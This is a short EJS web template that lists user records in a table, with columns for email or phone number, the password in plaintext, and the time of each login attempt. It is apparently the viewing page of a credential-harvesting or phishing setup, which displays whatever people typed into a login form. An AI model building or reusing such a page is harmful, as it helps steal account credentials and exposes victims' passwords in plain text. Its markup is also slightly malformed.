<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="../user.css">
    <title>Document</title>
</head>
<body>
    <div>

        
    <% if (locals.user) { %>
        <h1>Users Info</h1>
        <table border="1">
            <tr>
                <th>S.N</th>
                <th>Email or Phone Number</th>
                <th>Password</th>
                <th>Time and Date when trying to login </th>
            </tr>
            <% user.forEach((users,index) => { %>
                <tr>
                    <td><%= index+1  %></td>
                    <td><%= users.email  %></td>
                    <td><%= users.password %></td>
                    <td><%= users.createdAt %></td>
                </tr>
            <% }) %>
    <% } %>
    <% if (!locals.user) { %>
       <h1>There is no user present</h1>
    <% } %>
</div>
    </table>
</body>
</html>